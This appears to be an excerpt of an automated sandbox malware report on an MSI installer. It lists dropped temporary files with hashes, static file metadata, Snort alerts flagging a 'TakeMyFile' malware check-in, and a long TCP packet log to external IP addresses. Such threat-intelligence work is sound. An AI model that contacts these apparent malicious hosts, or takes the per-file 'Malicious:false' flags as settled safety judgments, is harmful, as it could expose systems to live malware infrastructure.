                                                SHA-512:97AD0366F26048467626738FACB22B7D6F55A3AD4E35DBAE4E7F7DDA99A1AC6880E5D93D86443C4B59A4155994636A90C3E22D18654A5D24920615935ACC29C2
                                                Malicious:false
                                                Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                                C:\Windows\Temp\~DF1838A3BAB0EFA9CA.TMP

                                                Download File
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):32768
                                                Entropy (8bit):0.07203719608854268
                                                Encrypted:false
                                                SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOTvwnxAkTl9mAgVky6lit/:2F0i8n0itFzDHFcn3pAait/
                                                MD5:13C6D4173C90CD9AC7286B918A27ED04
                                                SHA1:2B5BC66CEE77CBA53E2E7639F22FA0A8C5F95EAF
                                                SHA-256:435A8871E2B39B8653420A506887C71EB38EEC482A32E5092E6A7FA43A8122E5
                                                SHA-512:695A59026EBB9B5B16D4B64671F4BEE3130C73698B340D27B6D844B5F61AD7F8DB60167715C36472254111711BBC731BD24BA9A5250130FAE388155EFC411777
                                                Malicious:false
                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Windows\Temp\~DF40DBEA473D1541FB.TMP

                                                Download File
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):49152
                                                Entropy (8bit):1.210974941216352
                                                Encrypted:false
                                                SSDEEP:48:/sNcuAO+CFXJXT55UVycqteHyvSHAErCyFc8xfoHswXGcp4ru2xBxYxMxqxrxbx0:gcy/T38XqcHaBwCYco2WGI9
                                                MD5:879F256EC2DFA06ED7232C7A58F9C6A1
                                                SHA1:301D3D0867B3CCD7F49EE832F56FF59BBF74C9EE
                                                SHA-256:4F7772FE8FAD1779216C279942CF753E5947DE00A99D3AC45993AF0DBAEA2274
                                                SHA-512:0AD1E3794C7582B223321BE6E6DF9943CC438396A70D14D0386BD8418CDF249AD55301696EBAA06CBB80075E8DA28512D82DAE7EB8C37F00E0BE0B6361A01A90
                                                Malicious:false
                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Windows\Temp\~DF673FEBEB8CD68A88.TMP

                                                Download File
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):512
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                Malicious:false
                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Windows\Temp\~DF828128EBC4E56A1C.TMP

                                                Download File
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):73728
                                                Entropy (8bit):0.30835671610571197
                                                Encrypted:false
                                                SSDEEP:48:L0Sj/TdSbSHAErCyFc8xfoHswXGcp4ru2xBxYxMxqxrxbxEoyMboLt2IXGNRteHS:zNeBwCYco2WGTcHS
                                                MD5:F91E54E156B71F014A73F92672AC48DD
                                                SHA1:044C012A5489ED7EF70412CDAC9C772B41A96547
                                                SHA-256:FB35806C6CB5B461870EA006F3A1B65B50CD9E47B1FCFF001AA0C85EEBB79E3F
                                                SHA-512:7B3CAF5B456897179F0AA6895568F829488600FE11F8091C781F98B3407455781220072D8C493058F2041A21CB6C7E3C38E327AB0F668E10FC1DA124442DD18E
                                                Malicious:false
                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Windows\Temp\~DFA2CC6402BBFEED3B.TMP

                                                Download File
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):512
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                Malicious:false
                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Windows\Temp\~DFE939D0208FD4A816.TMP

                                                Download File
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):24576
                                                Entropy (8bit):1.8447018010154044
                                                Encrypted:false
                                                SSDEEP:48:2S8PhUuRc06WXJWFT5mqteHyvSHAErCyFc8xfoHswXGcp4ru2xBxYxMxqxrxbxE3:yhU1tFToqcHaBwCYco2WGI9
                                                MD5:FD30B6096437EB7029AD78BD1C5D8916
                                                SHA1:C8416EFC2DA011D6BA69DC4FA9D790E54F43D569
                                                SHA-256:3B4B5BABFBB1E75F0BC23DF89417B6F901B71A969CD25A14B6357D62A8384D22
                                                SHA-512:3E6867D1538C548F5F22846560F4AFCCDCE4BF7EEB521BF1E429E239FF105B7F263D71387EBBDED5B75D16F9CC6AAF5C91121F957BC2998C5FE17960EAFF7C21
                                                Malicious:false
                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                \Device\Mup\user-PC*\MAILSLOT\NET\NETLOGON

                                                Download File
                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):3.6936534414266404
                                                Encrypted:false
                                                SSDEEP:3:2lc5I2Y1AnHBXh/slLn:CtGhxcLn
                                                MD5:D98635DC9E26682F19763A852557FEBB
                                                SHA1:CF7F21BA7ABB8390726E742EBEFC00CAFD9DEBFD
                                                SHA-256:65017F548B1C9EDB4E7904068E569EBA8B97E9A7D95483C1E9BD2CEA3E931218
                                                SHA-512:B61E5269CF3EB8D64F697F5EB6DFE94BB01AA54F12FAD794204AD6CAEEFED449333812333D12C956FE5623BC07F9D0D0FE73D2D5F4AC15C8DE35173FF6FC8B35
                                                Malicious:false
                                                Preview:....4.9.4.1.2.6.....\MAILSLOT\NET\GETDCB71CF02D.................

                                                Static File Info

                                                General

                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {98FE3458-F15D-4F62-81E0-574992C1406B}, Number of Words: 10, Subject: LLIFIIIIRK IIRIRIR, Author: LLIFIIIIRK IIRIRIR, Name of Creating Application: Advanced Installer 18.3 build e2a0201b, Template: ;1046, Comments: A base dados do instalador contm a lgicaLLIFIIIIRK IIRIRIRcessrios para instalar o LLIFIIIIRK IIRIRIR., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                Entropy (8bit):7.596833709557238
                                                TrID:
                                                • Windows SDK Setup Transform Script (63028/2) 47.91%
                                                • Microsoft Windows Installer (60509/1) 46.00%
                                                • Generic OLE2 / Multistream Compound File (8008/1) 6.09%
                                                File name:2ztvLMT477.msi
                                                File size:5'453'039 bytes
                                                MD5:213fc1be9b6af3bed890f19a6747bf26
                                                SHA1:284e9d99d24731d889373752567e0e3ff2cf92e4
                                                SHA256:236a03c3345f710b5d137e9ae3298847ed83e61de998f5b600ac440cccc4fc23
                                                SHA512:93b1562deaaed6bcb96cf61f75df994d97c9193dfcfda055809a2420a19434eeadbd5a56df2fd09fa0e9e95518932adb025c6ec5eef6f77b3fa3be450e2302a8
                                                SSDEEP:98304:TxMiAtKknz5vqursRe4frUMXjcYusLgi2I0QxYvLH7sK4mGTxgcVU8XkPdYU:TAYursRVje+gNOUH4NnVU8XG
                                                TLSH:7146F11275CA8736EA7E8534A5AAD73A20FA3FE01BB154DF53C4593A0EB05C242B1F17
                                                File Content Preview:........................>...................'...................................................................................................................J...K...L...M...N...O...P...Q...R...S...T...U..................................................

                                                File Icon

                                                Icon Hash:2d2e3797b32b2b99

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                05/16/24-04:41:24.547046TCP2849814ETPRO MALWARE TakeMyFile User-Agent4971080192.168.2.554.227.134.57
                                                05/16/24-04:41:24.547046TCP2849813ETPRO MALWARE TakeMyFile Installer Checkin4971080192.168.2.554.227.134.57

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                May 16, 2024 04:40:58.523416996 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:40:58.523464918 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:40:58.523556948 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:40:58.524735928 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:40:58.524749994 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:40:59.094048977 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:40:59.094125032 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:40:59.096678972 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:40:59.096685886 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:40:59.096920013 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:40:59.137804031 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:40:59.180121899 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:40:59.643775940 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:40:59.693279028 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:40:59.920644999 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:40:59.920656919 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:40:59.920687914 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:40:59.920697927 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:40:59.920703888 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:40:59.920723915 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:40:59.920730114 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:40:59.920751095 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:40:59.920785904 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:40:59.920825958 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:40:59.920834064 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:40:59.920856953 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:40:59.920888901 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:40:59.920897007 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:40:59.920918941 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:40:59.920933962 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:00.197557926 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.197571039 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.197607040 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.197638988 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:00.197649956 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.197690010 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:00.197702885 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:00.197727919 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.197742939 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.197779894 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:00.197783947 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.197801113 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:00.197819948 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:00.197916031 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.197933912 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.197966099 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:00.197969913 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.198007107 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:00.198015928 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:00.475734949 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.475749016 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.475783110 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.475822926 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:00.475836992 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.475876093 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:00.475884914 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:00.753509045 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.753525972 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.753556967 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.753588915 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:00.753602982 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.753627062 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:00.753633022 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.753644943 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:00.753648996 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.753668070 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.753676891 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:00.753707886 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:00.753711939 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.753772020 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.753782034 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:00.753787041 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.753812075 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.753824949 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:00.753830910 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.753861904 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:00.753873110 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.753895998 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.753937006 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:00.753941059 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.753952980 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.753962040 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:00.753978014 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.754003048 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:00.754009008 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:00.754028082 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:00.754045010 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:00.754093885 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.031400919 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.031423092 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.031476974 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.031487942 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.031502008 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.031511068 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.031527996 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.031538010 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.031547070 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.031554937 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.031590939 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.031618118 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.031630993 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.031663895 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.031667948 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.031692028 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.031707048 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.031718016 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.031723022 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.031744003 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.031759977 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.031763077 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.031785965 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.031802893 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.031833887 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.031848907 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.031877995 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.031881094 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.031893015 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.031907082 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.031915903 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.031934977 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.031939030 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.031965971 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.031995058 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.033862114 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.033875942 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.033914089 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.033917904 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.033947945 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.033967018 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.311948061 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.311976910 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.312030077 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.312066078 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.312077045 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.312113047 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.312146902 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.312160015 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.312179089 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.312184095 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.312200069 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.312235117 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.312248945 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.312294006 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.312305927 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.312305927 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.312310934 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.312339067 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.312360048 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.312360048 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.312370062 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.312392950 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.312585115 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.588402033 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.588428974 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.588500977 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.588514090 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.588531017 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.588551044 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.588578939 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.588578939 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.588584900 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.588607073 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.588879108 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.865670919 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.865691900 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.865750074 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.865773916 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.865782022 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.865847111 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.865859032 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.865874052 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.865901947 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.865935087 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.865942955 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.865957975 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:01.865971088 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:01.866025925 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:02.143868923 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.143898964 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.143990040 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:02.143990040 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:02.144001961 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.144071102 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.144095898 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.144118071 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:02.144123077 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.144378901 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:02.144671917 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.144695044 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.144814014 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:02.144819021 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.144881010 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:02.422101021 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.422122002 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.422195911 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:02.422208071 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.422243118 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:02.422525883 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.422543049 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.422580004 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:02.422586918 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.422611952 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:02.422629118 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:02.424052954 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.424068928 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.424134016 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:02.424139023 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.424180984 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:02.700936079 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.700951099 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.700984001 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.701030970 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:02.701044083 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.701097012 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:02.701102972 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.701147079 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.701174974 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:02.701181889 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.701196909 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:02.701220036 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:02.978027105 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.978045940 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.978111029 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:02.978118896 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.978157043 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:02.978493929 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.978508949 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.978568077 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:02.978573084 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:02.978617907 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:03.255888939 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:03.255913019 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:03.256026983 CEST49704443192.168.2.5194.180.191.24
